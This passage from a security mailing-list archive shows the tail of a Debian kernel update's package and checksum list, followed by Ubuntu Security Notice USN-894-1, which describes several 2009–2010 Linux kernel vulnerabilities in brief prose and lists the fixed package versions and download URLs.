http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   258962 75184bed1f0b42cd8e002f93ed42198a\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:  3656680 c5499cb98cdcdcadc48e3aa5bdf1d379\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19214268 e3f564cae5a85355f4b5a9248a11af98\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19148424 dd1d713c896888370a1667a16571c08c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   346982 6a6a08f74f9690705e6d770d1f3f2566\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   359548 b10fe011746b0df5fbd2587292af34ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19482314 5d9cc150e340aea40e253a757cfdc423\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:    83452 32a1614212e964a4423b161b34cd758d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19213598 4f459c2d2cdb87a6f945cbee7d4500d4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   358212 58ba32b0701643f043ab38a487cae609\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:    83424 c1e8493aff96df5b0fe33f5af4686f98\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   358752 4e3e9ef18a14fd191444591df571f80c\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:  3569470 9ae824064bfc785f4b3512db78119e46\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum: 32206374 badd40dd68e2c6634c65f79d9536e34d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:    83432 64a48fa9283b1741e22f0a22dbb93b20\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:    83456 235a5572d5e109a4b575080a8262dc57\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:   319938 d7dc0120458e93119879dcdd1e48017e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum: 32025762 7595d7dc21d3273f46b35b8c00b0e195\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:   320226 34731a37b519d726b133093e04d937c3\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 22243472 532341ea0847ea19414413f7659ff13d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   248638 ce9da5c377d6328e9bb9be1c3945fff8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 12001172 817c44fd5afbeef1b9f172522ff21bcb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 10553972 20ddd95631b93efd52ae0aa38a5cd6d4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:    83600 a7b66d71779dea207a3d49cb9f692fdb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 27858364 54998117445c20f413331d1197355745\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 17212542 bf6c996fd387eef151e0db60d1bd00f2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   313302 314b57dc807eb91f617c10b1497e1617\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   314602 2c127076bf189be2836a4c3a4c7736af\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:  3804368 fbcb3bdd668db166ad3f08e6dbfbc6e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 17194888 9bce41a8b9936a16a3aa9cca675b9638\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:    83540 8acdb1b4a4bc57f55b9cc5b2b04043a4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   229412 0b93c7c909eca04fad4fa45e3e73e96c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   248700 13266a2acd5fcbd75d11049dd5e5ad58\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   218314 4174dec1c73ca114469cbb88fba32926\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 16567710 29d2ab68b4259a1822a2ca19e9494f5d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   309868 d69b27ef946f2ac62b115e0200fe8002\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 26988356 f0d885b353b15dc42e4e76da8a8fb129\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   248150 7c585f74e0752a631050b13b9740c0c3\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 13318088 0b0a8b724245ac10817b03c4cf734827\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:    83484 a678208f18017a9c87d45548916fd98e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   311392 5b1f0957a2756b04be6c95ae8ca5e2c8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 21736368 02da1a4e543b8c5082476b156281cb31\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   247968 929ca712a0aa0984f9dc2a6f68f405a5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 16632240 c9de1dfccb8a5cb5d5d652ca694a7108\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:  3805532 be10a8b64da3adf7ece3846b0b0bf930\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:    83434 ac0cb9b5939e4ea82c3c83a1a1d473ed\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   248174 50e84058a7d710f013f92e1fe68a705c\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   322474 2d7e39cf0b78d98125a0baba377f1af0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 19195556 bb2bd8e203cee7b3c6739d5c5d11901a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   324008 3b021bb4b3dac72dc68e701f4a209939\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   295928 ca2bf1c3c12f409e469c516877a8e91c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 21170062 4022dbff73ebfde3a846ce38896cf09c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   322502 4b76cce255e1fcc72cb82053cd34a1a2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 17459240 ad749c6e735e58d775b7190ff3d26e50\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:    83466 a041c0fdb383832cf725723ce22e40c0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:    83430 392d415932625b1a69dc6494d2f737e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:  3674486 200fdcca2140a97f961a37d70db620d5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 19487244 b42ad8431643d89a1f8b0e6e0aaeb39e\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:    83532 a1c34683fe304f1a86bbc28f6cbc654c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:    83556 bf7fed1ef4da92d782409fe8345f861a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  6976486 5b5db16fea4336068bbcd5bff56ad575\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  7228452 75c044fa17d6071de36579a1491c2e1b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  3431908 18825f85900faca81b21e48d43af6ee7\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:   197006 0a44248e77ec1ff027edd032ebe5b2c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  1503494 bd7f7b7bd4e120472bf60ad0b7d9184e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:   196810 f03114c2f256a97b15f88d2659f9501b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:    83428 1ea7179752fbb45e10e731991583db68\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:   263546 ef894d6917cbe692ec9197048538d5e7\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:  3651402 a0194c650712040f81e97d5b3b62bc79\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:   264892 0b642e20f00b52c20b6ae9e0ee1f78b8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:    83442 6d109d7f131dab564736e2ac6a85dd29\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum: 13318532 dbce062bfa560c331b75bed073868e1d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum: 13019464 b0b153fafa43b650e996a9d84bbb26d7\n\n  These changes will probably be included in the oldstable distribution on\n  its next update. ===========================================================\nUbuntu Security Notice USN-894-1          February 05, 2010\nlinux, linux-source-2.6.15 vulnerabilities\nCVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138,\nCVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538,\nCVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 8.10\nUbuntu 9.04\nUbuntu 9.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-55-386       2.6.15-55.82\n  linux-image-2.6.15-55-686       2.6.15-55.82\n  linux-image-2.6.15-55-amd64-generic  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-k8  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-server  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-xeon  2.6.15-55.82\n  linux-image-2.6.15-55-hppa32    2.6.15-55.82\n  linux-image-2.6.15-55-hppa32-smp  2.6.15-55.82\n  linux-image-2.6.15-55-hppa64    2.6.15-55.82\n  linux-image-2.6.15-55-hppa64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-itanium   2.6.15-55.82\n  linux-image-2.6.15-55-itanium-smp  2.6.15-55.82\n  linux-image-2.6.15-55-k7        2.6.15-55.82\n  linux-image-2.6.15-55-mckinley  2.6.15-55.82\n  linux-image-2.6.15-55-mckinley-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc   2.6.15-55.82\n  linux-image-2.6.15-55-powerpc-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-server    2.6.15-55.82\n  linux-image-2.6.15-55-server-bigiron  2.6.15-55.82\n  linux-image-2.6.15-55-sparc64   2.6.15-55.82\n  linux-image-2.6.15-55-sparc64-smp  2.6.15-55.82\n\nUbuntu 8.04 LTS:\n  linux-image-2.6.24-27-386       2.6.24-27.65\n  linux-image-2.6.24-27-generic   2.6.24-27.65\n  linux-image-2.6.24-27-hppa32    2.6.24-27.65\n  linux-image-2.6.24-27-hppa64    2.6.24-27.65\n  linux-image-2.6.24-27-itanium   2.6.24-27.65\n  linux-image-2.6.24-27-lpia      2.6.24-27.65\n  linux-image-2.6.24-27-lpiacompat  2.6.24-27.65\n  linux-image-2.6.24-27-mckinley  2.6.24-27.65\n  linux-image-2.6.24-27-openvz    2.6.24-27.65\n  linux-image-2.6.24-27-powerpc   2.6.24-27.65\n  linux-image-2.6.24-27-powerpc-smp  2.6.24-27.65\n  linux-image-2.6.24-27-powerpc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-rt        2.6.24-27.65\n  linux-image-2.6.24-27-server    2.6.24-27.65\n  linux-image-2.6.24-27-sparc64   2.6.24-27.65\n  linux-image-2.6.24-27-sparc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-virtual   2.6.24-27.65\n  linux-image-2.6.24-27-xen       2.6.24-27.65\n\nUbuntu 8.10:\n  linux-image-2.6.27-17-generic   2.6.27-17.45\n  linux-image-2.6.27-17-server    2.6.27-17.45\n  linux-image-2.6.27-17-virtual   2.6.27-17.45\n\nUbuntu 9.04:\n  linux-image-2.6.28-18-generic   2.6.28-18.59\n  linux-image-2.6.28-18-imx51     2.6.28-18.59\n  linux-image-2.6.28-18-iop32x    2.6.28-18.59\n  linux-image-2.6.28-18-ixp4xx    2.6.28-18.59\n  linux-image-2.6.28-18-lpia      2.6.28-18.59\n  linux-image-2.6.28-18-server    2.6.28-18.59\n  linux-image-2.6.28-18-versatile  2.6.28-18.59\n  linux-image-2.6.28-18-virtual   2.6.28-18.59\n\nUbuntu 9.10:\n  kernel-image-2.6.31-108-imx51-di  2.6.31-108.21\n  linux-image-2.6.31-19-386       2.6.31-19.56\n  linux-image-2.6.31-19-generic   2.6.31-19.56\n  linux-image-2.6.31-19-generic-pae  2.6.31-19.56\n  linux-image-2.6.31-19-ia64      2.6.31-19.56\n  linux-image-2.6.31-19-lpia      2.6.31-19.56\n  linux-image-2.6.31-19-powerpc   2.6.31-19.56\n  linux-image-2.6.31-19-powerpc-smp  2.6.31-19.56\n  linux-image-2.6.31-19-powerpc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-server    2.6.31-19.56\n  linux-image-2.6.31-19-sparc64   2.6.31-19.56\n  linux-image-2.6.31-19-sparc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-virtual   2.6.31-19.56\n  linux-image-2.6.31-211-dove     2.6.31-211.22\n  linux-image-2.6.31-211-dove-z0  2.6.31-211.22\n  linux-image-2.6.31-304-ec2      2.6.31-304.10\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06)\nthe kernel updates have been given a new version number, which requires\nyou to recompile and reinstall all third party kernel modules you\nmight have installed. Unless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-server, linux-powerpc), a standard system\nupgrade will automatically perform this as well. \n\nDetails follow:\n\nAmerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\nfilesystems did not correctly check certain disk structures.  Ubuntu 9.10 was not\naffected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest\ninstructions.  A local attacker in a guest could exploit this to\ntrigger high scheduling latency in the host, leading to a denial of\nservice.  Ubuntu 6.06 was not affected.  Ubuntu 6.06 was not\naffected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle\nO_ASYNC on locked files.  Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e\nnetwork drivers did not correctly check the size of Ethernet frames. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that \"print-fatal-signals\" reporting could show\narbitrary kernel memory contents.  A local attacker could exploit\nthis, leading to a loss of privacy. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\nhandle jumbo frames.  Only Ubuntu 9.04 and 9.10 were\naffected.  A local attacker could disrupt network\ntraffic, leading to a denial of service. (CVE-2010-0291)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz\n      Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc\n      Size/MD5:     2921 682576890de917043eccf6fc9398aed2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb\n      Size/MD5:    96386 b184441d2f44037554d037d217688393\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     2312 d464c76f98a4142add7a69aca1305739\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49160 a512718368004f81e83063ea8972c871\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36776 fcb0833daefa645545a2451824094b21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   287606 f3cc835959f215c209dc5a825596849c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5:   872448 1a70a906bccd7642241535f79feddb57\n    